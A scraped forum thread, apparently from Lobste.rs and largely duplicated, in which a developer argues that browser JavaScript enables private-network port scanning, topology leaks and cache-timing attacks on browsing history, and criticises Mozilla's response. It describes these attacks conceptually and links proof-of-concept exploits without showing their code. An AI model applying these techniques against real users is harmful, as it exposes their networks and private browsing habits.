what you're doing is boiling the whole web ecosystem to a single aspect, and then being rather aggressive with people who aren't.
Aggressive? Honestly, I do not think so.
The attack here is a quick and dirty hack that doesn't even work against all private networks, but it shows pretty well what is at stake.
And it's really just one of the possible attacks!
There's bilions of users that would get, what they would feel like, a broken web, because of an issue that will most likely never affect them.
It all depends on how good is the UI.
Many react to these solutions like if I was suggesting to let the UI unchanged. AFAIK, no standard dictates that you have to edit about:config to disable JavaScript.
And yet the UI to opt-out JavaScript is way worse than the worsts GDPR-compliance attempts I've seen so far. This is not an UI design error. This is a deliberate choice.
Turn out that such choice is a sort of "Insecurity through obscurity": most people are forced to execute code controlled by strangers because they do not know how to avoid that. AND because you could not avoid it on a web site you do not trust and allow it on one you trust.
it's not even that useful to make it opt-in, since if 99.999% of pages will give you a pop-up to opt-in, people will just learn to click it without hesitation?
You largerly overestimate the amount of web that truly need JavaScript.
The simple fact that people would have to opt-in JavaScript would drastically reduce the number of sites that use it. Web developer would start to test the web without JavaScript too, CSS and HTML would progress faster than they currently do and we would have an overall faster and safer web.
Just like the GDPR, opt-in JavaScript would improve the quality of Web.
Because a lot of people that now have NO CHOICE but to run JS, would have a choice.
Any software that gets a sizable user base becomes hard to maintain, because no issue is ever just a programming issue.
After 20 years in the field, I think I got it pretty well. ;-)
But, whenever I did an error (even expensive ones, in the early design phase) that opened a serious vulnerability for my users, I had to fix it as soon as possible. And frankly, when asked about the issue by a customer, I've always explained the issue clearly, explaining ALL the implications. I can ensure you that it has never been pleasant. But it was the ONLY thing to do.
Here Mozilla is not even saying if their users are vulnerable to this whole class of attacks.
This is the problem that, IMHO, breaks the Web.
Mozilla claims to care about user privacy. People trust them.
Calling people who do that work "clowns" is just disrespectful.
Good point. You are right.
Maybe after being called "troll" and "absurd" by people that doesn't seem to understand the issue I got a bit... "annoyed". I sincerely apologize.
Yet, I really do think that we should NOT need PR to get a severe vulnerability fixed. That's a bad sign about our entire field.
Let me clarify: I think it is ridiculous (for software engineering as a whole) that we need marketing or propaganda to get a bug like heartbleed fixed. And it's even more ridiculous because it doesn't work, or... maybe... did you get a repaired processor for free?
If you didn't, you are right and I sincerely apologize to all professional clowns for comparing them to the state of our field! They are artists! They make us laugh... on purpose!
I didn't mention JS-blocking extensions (e.g. NoScript) to avoid asking you to read the bug report more carefully. Since you insist... please read the bug report more carefully. AFAIK they wouldn't prevent these attacks, unless you totally disable JavaScript everywhere. Remember, the JavaScript can be "customized" after gaining your trust! Also installing such extensions assumes you already understand the risks (that so far browsers' vendors have not admitted), while most of people do not understand them. As programmers, it's up to us to build secure software like it's up to civil engineers build safe bridges.
The same goes for HTTPS: anyone can buy a certificate, these attacks leave no evidences and they can target a single specific person among thousands users of a web site.
Now... are you going to pretend that my sarcasm here can justify the silence of Mozilla?
And honestly, I still can't see how this affects people who aren't attacked by actors with massive resources [...]
If you can't think of cheap attacks, please trust me: there's no need for massive resources.
All you need is to attract the victim on a website you control.
But even if you were right about this (and you are not), you should also consider another important aspect of this vulnerability: if you were an actual criminal you could use the mere existence of these undetectable attacks to gain plausible deniability.
Even if these attack were "only" putting users' privacy at risk (and they are not), this is something no legal system can allow.
Now that you called me "arrogant", you could consider to go back on the bug reports I wrote and to the related Lobste.rs thread and count how many dismissive, condescending and insulting response I got. Try to count how many time it has been said that I was trolling, how many times it has been said that I was absurd or bizarre.
Compare them with my responses.
Have I ever called someone Troll? Absurd? Bizarre?
Even read my responses to Frederik Braun that first began with "Okay, I’ll bite." and later explained me what "Turing complete" means, I just kept asking a single question: are Firefox users vulnerable to such attacks?
That's because all I care about are the people that can be damaged by these attacks.
I find it disturbing that a programmer like me doesn't have the balls to answer such an important question that affects millions of people.
Thus, sorry for my previous comment. Really.
It was intentionally abrasive just to make you understand a little how I feel.
You can find a quick & dirty PoC here (very quick, it took a few minutes to write) It shows how to discover the TCP ports open on your PC despite it being behind a firewall and a proxy. It was rapidly tested on a few networks (professionally configured by senior sysadmins) and it worked fine, but it doesn't work everywhere.
Rain1 have built a nicer exploit that leaks your private network topology here.
With a similar timing attack against the cache, you can discover if a user visited a certain 3rd party page, deducing his sexual tastes or his political orientation despite CORS, sandboxing and all other stuffs that Mozilla set up to "protect users' privacy".
The problem is that the number of exploits is potentially unbounded, it would take too much time to write them all. But if you know a little about web development, it's pretty funny to invent new ones! Just please, add them to the bug report for future reference.
And remember: the web site or CDN can serve to a single person these malicious JS and then override them thanks to Cache Control, leaving no evidence of the attack.
Ok, it seems that we have different understanding about the terms attack and exploit.
First PoC: Updating my /etc/hosts to allow bad script doing bad things? Nope.
Second PoC: Just did not get it working.
Yes, there were a lot several cases in the past. Get the link-color of visited links in css, using css3 transparency to get your facebook-profile name ... just to name a few.
All of them were handled as serious bugs and get fixed fast.
So, if you have a bug and you can demonstrate it, nice. If you want to discuss things, then I think here is the right place I guess.
After writing this: I still have a different opinion on this topic and think it's wrong to blame Mozilla. They proved in the past often times, that they value privacy and security.
I hope Mozilla know them. Actually I hope Mozilla developers can deduce at least all the attacks I can conceive from the description I wrote in the bug report.
Second PoC: Just did not get it working.
The fact that it does not work on your specific machine/network doesn't mean much.
It's a proof-of-concept. It works. Tweak it a little.
Rain1 even explained carefully how it works.
After writing this: I still have a different opinion on this topic and think it's wrong to blame Mozilla. They proved in the past often times, that they value privacy and security.
Exactly this vulnerability is why we try to get Freenet users to use Freenet as proxy with random local IP (127.x.y.z) and PORT.
That way an attacker needs roughly 200 billion requests on average to find the local service (using only 5001..32000 as ports, because they are sure not to be ephemeral).
Aggressive? Honestly, I do not think so.
The attack here is a quick and dirty hack that doesn't even work against all private networks, but it shows pretty well what is at stake.
And it's really just one of the possible attacks!
It all depends on how good is the UI.
Many react to these solutions like if I was suggesting to let the UI unchanged. AFAIK, no standard dictates that you have to edit about:config to disable JavaScript.
And yet the UI to opt-out JavaScript is way worse than the worsts GDPR-compliance attempts I've seen so far. This is not an UI design error. This is a deliberate choice.
Turn out that such choice is a sort of "Insecurity through obscurity": most people are forced to execute code controlled by strangers because they do not know how to avoid that. AND because you could not avoid it on a web site you do not trust and allow it on one you trust.
You largerly overestimate the amount of web that truly need JavaScript.
The simple fact that people would have to opt-in JavaScript would drastically reduce the number of sites that use it. Web developer would start to test the web without JavaScript too, CSS and HTML would progress faster than they currently do and we would have an overall faster and safer web.
Just like the GDPR, opt-in JavaScript would improve the quality of Web.
Because a lot of people that now have NO CHOICE but to run JS, would have a choice.
After 20 years in the field, I think I got it pretty well. ;-)
But, whenever I did an error (even expensive ones, in the early design phase) that opened a serious vulnerability for my users, I had to fix it as soon as possible. And frankly, when asked about the issue by a customer, I've always explained the issue clearly, explaining ALL the implications. I can ensure you that it has never been pleasant. But it was the ONLY thing to do.
Here Mozilla is not even saying if their users are vulnerable to this whole class of attacks.
This is the problem that, IMHO, breaks the Web.
Mozilla claims to care about user privacy. People trust them.
Good point. You are right.
Maybe after being called "troll" and "absurd" by people that doesn't seem to understand the issue I got a bit... "annoyed". I sincerely apologize.
Yet, I really do think that we should NOT need PR to get a severe vulnerability fixed. That's a bad sign about our entire field.
Very interesting.
Let me clarify: I think it is ridiculous (for software engineering as a whole) that we need marketing or propaganda to get a bug like heartbleed fixed. And it's even more ridiculous because it doesn't work, or... maybe... did you get a repaired processor for free?
If you didn't, you are right and I sincerely apologize to all professional clowns for comparing them to the state of our field! They are artists! They make us laugh... on purpose!
I didn't mention JS-blocking extensions (e.g. NoScript) to avoid asking you to read the bug report more carefully. Since you insist... please read the bug report more carefully. AFAIK they wouldn't prevent these attacks, unless you totally disable JavaScript everywhere. Remember, the JavaScript can be "customized" after gaining your trust! Also installing such extensions assumes you already understand the risks (that so far browsers' vendors have not admitted), while most of people do not understand them. As programmers, it's up to us to build secure software like it's up to civil engineers build safe bridges.
The same goes for HTTPS: anyone can buy a certificate, these attacks leave no evidences and they can target a single specific person among thousands users of a web site.
Now... are you going to pretend that my sarcasm here can justify the silence of Mozilla?
If you can't think of cheap attacks, please trust me: there's no need for massive resources.
All you need is to attract the victim on a website you control.
But even if you were right about this (and you are not), you should also consider another important aspect of this vulnerability: if you were an actual criminal you could use the mere existence of these undetectable attacks to gain plausible deniability.
Even if these attack were "only" putting users' privacy at risk (and they are not), this is something no legal system can allow.
Caught! :-D
Now that you called me "arrogant", you could consider to go back on the bug reports I wrote and to the related Lobste.rs thread and count how many dismissive, condescending and insulting response I got. Try to count how many time it has been said that I was trolling, how many times it has been said that I was absurd or bizarre.
Compare them with my responses.
Have I ever called someone Troll? Absurd? Bizarre?
Even read my responses to Frederik Braun that first began with "Okay, I’ll bite." and later explained me what "Turing complete" means, I just kept asking a single question: are Firefox users vulnerable to such attacks?
That's because all I care about are the people that can be damaged by these attacks.
I find it disturbing that a programmer like me doesn't have the balls to answer such an important question that affects millions of people.
Thus, sorry for my previous comment. Really.
It was intentionally abrasive just to make you understand a little how I feel.
Can you provide a proof-of-concept? I read the linked articles but I'm unable to follow your logic.
You can find a quick & dirty PoC here
(very quick, it took a few minutes to write)
It shows how to discover the TCP ports open on your PC despite it being behind a firewall and a proxy. It was rapidly tested on a few networks (professionally configured by senior sysadmins) and it worked fine, but it doesn't work everywhere.
Rain1 have built a nicer exploit that leaks your private network topology here.
With a similar timing attack against the cache, you can discover if a user visited a certain 3rd party page, deducing his sexual tastes or his political orientation despite CORS, sandboxing and all other stuffs that Mozilla set up to "protect users' privacy".
The problem is that the number of exploits is potentially unbounded, it would take too much time to write them all. But if you know a little about web development, it's pretty funny to invent new ones!
Just please, add them to the bug report for future reference.
And remember: the web site or CDN can serve to a single person these malicious JS and then override them thanks to Cache Control, leaving no evidence of the attack.
The best security door cannot protect an house without walls.
Ok, it seems that we have different understanding about the terms attack and exploit.
First PoC: Updating my /etc/hosts to allow bad script doing bad things? Nope.
Second PoC: Just did not get it working.
Yes, there were a lot several cases in the past. Get the link-color of visited links in css, using css3 transparency to get your facebook-profile name ... just to name a few.
All of them were handled as serious bugs and get fixed fast.
So, if you have a bug and you can demonstrate it, nice. If you want to discuss things, then I think here is the right place I guess.
After writing this: I still have a different opinion on this topic and think it's wrong to blame Mozilla. They proved in the past often times, that they value privacy and security.
Yes we have very different understanding of network security.
Do you know what DNS rebinding is?
I hope Mozilla know them.
Actually I hope Mozilla developers can deduce at least all the attacks I can conceive from the description I wrote in the bug report.
The fact that it does not work on your specific machine/network doesn't mean much.
It's a proof-of-concept. It works. Tweak it a little.
Rain1 even explained carefully how it works.
As I wrote in the thread suggested by Mozilla to discuss the issue (now censored on Lobste.rs) I used to trust them too.
But I do not trust them anymore. That's just empty marketing.
To prove me wrong, to prove they deserve the trust of their users, there's just one thing they have to do: tell everybody the answer to this question:
People deserve the same answer from Google, Microsoft and Apple, but at least they do not blether that they care about users' privacy.
Exactly this vulnerability is why we try to get Freenet users to use Freenet as proxy with random local IP (127.x.y.z) and PORT.
That way an attacker needs roughly 200 billion requests on average to find the local service (using only 5001..32000 as ports, because they are sure not to be ephemeral).
See d6.gnutella2.info/freenet/USK@sUm3...